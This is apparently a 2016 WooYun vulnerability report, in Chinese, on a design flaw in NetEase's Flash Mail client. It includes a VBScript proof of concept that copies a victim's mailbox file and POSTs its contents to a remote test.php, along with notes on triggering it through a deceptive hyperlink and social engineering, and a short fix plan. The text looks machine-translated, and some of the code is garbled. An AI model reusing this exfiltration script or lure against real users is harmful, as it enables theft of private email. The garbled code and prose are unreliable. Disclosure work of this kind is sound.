漏洞标题 网易闪电邮客户端设计缺陷可导致远程种马/邮件窃取 相关厂商 网易 漏洞作者 数据流 提交时间 2016-03-10 16:04 公开时间 2016-06-12 13:40 漏洞类型 远程代码…
从对等方接收数据时失败
设置http=CreateObject('Msxml2.ServerXMLHTTP')
设置fso=createobject('scripting.filesystemobject')
Path=fso.GetFolder('。')的电子邮件地址。路径&'/./././account/victim/in.mbox'
fso.CopyFile路径,'mail.mbox',False'文件被客户端占用,Adodb.Stream无法读取先复制
设置stm=CreateObject('Adodb.Stream')
stm.Type=2
Stm.mode=3
Stm.charset='utf-8''fso不支持使用Adodb.Stream读取utf8
stm.Open
stm.LoadFromFile'mail.mbox'
邮件=stm.readtext
Http.open'POST','**。**。**。**/test.php',错误
http.setRequestHeader'Content-Type','application/x-www-form-urlencoded'
Http.send'mail''和邮件
漏洞证明:
受害者将在点击后自动执行
在URLdecode之后,您可以看到整个邮件的请求。
结合一些社会工作者。
超链接欺诈
修理计划:
1超链接到文件: //要做
2附件路径应该是随机的
版权声明:请注明数据流@乌云的来源